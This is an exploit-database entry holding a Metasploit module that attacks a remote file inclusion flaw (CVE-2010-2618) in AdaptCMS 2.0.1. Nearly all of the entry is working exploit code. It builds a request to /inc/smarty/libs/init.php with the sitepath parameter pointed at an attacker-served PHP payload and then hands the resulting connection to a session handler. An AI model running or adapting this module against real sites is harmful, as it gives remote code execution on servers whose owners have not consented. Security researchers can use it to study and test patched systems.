AdaptCMS 2.0.1 Beta Release Remote File Inclusion Vulnerability (msf)

2010-10-13T00:00:00
ID 1337DAY-ID-14427
Type zdt
Reporter v3n0m
Modified 2010-10-13T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            =====================================================================
AdaptCMS 2.0.1 Beta Release Remote File Inclusion Vulnerability (msf)
=====================================================================

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
 
require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
    Rank = ExcellentRanking
 
    include Msf::Exploit::Remote::Tcp
    include Msf::Exploit::Remote::HttpClient
    include Msf::Exploit::Remote::HttpServer::PHPInclude
 
    def initialize(info = {})
        super(update_info(info,
            'Name'           => 'AdaptCMS 2.0.1 Beta Released Remote File Inclusion Exploit',
            'Description'    => %q{
                    This module can be used to exploit Remote File Inclusion in AdaptCMS 2.0.1 or earlier in file /inc/smarty/libs/init.php.
 
            },
            'Author'         => [ 'v3n0m' , 'Yogyacarderlink-Indonesia' ],
            'License'        => MSF_LICENSE,
            'Version'        => '$Revision:$',
            'References'     =>             
                [
                    [ 'CVE', '2010-2618' ],
                    [ 'BID', '41116' ],
                ],
            'Privileged'     => false,
            'Payload'        =>
                {
                    'DisableNops' => true,
                    'Compat'      =>
                        {
                            'ConnectionType' => 'find',
                        },
                    'Space'       => 262144, # 256k
                },
            'Platform'       => 'php',
            'Arch'           => ARCH_PHP,
            'Targets'        => [[ 'Automatic', { }]],
            'DisclosureDate' => 'Oct 12 2010',
            'DefaultTarget' => 0))
 
        register_options([
            OptString.new('PHPURI', [ true , "The URI to request, with the include parameter changed to !URL!", '/inc/smarty/libs/init.php?sitepath=!URL!']),
            ], self.class)
    end
 
    def php_exploit
 
        timeout = 0.01
        uri = datastore['PHPURI'].gsub('!URL!', Rex::Text.to_hex(php_include_url, "%"))
        print_status("Trying uri #{uri}")
 
        response = send_request_raw( {
                'global' => true,
                'uri' => uri,
            },timeout)
 
        if response and response.code != 200
            print_error("Server returned non-200 status code (#{response.code})")
        end
         
        handler
    end
 
end



#  0day.today [2018-01-01]  #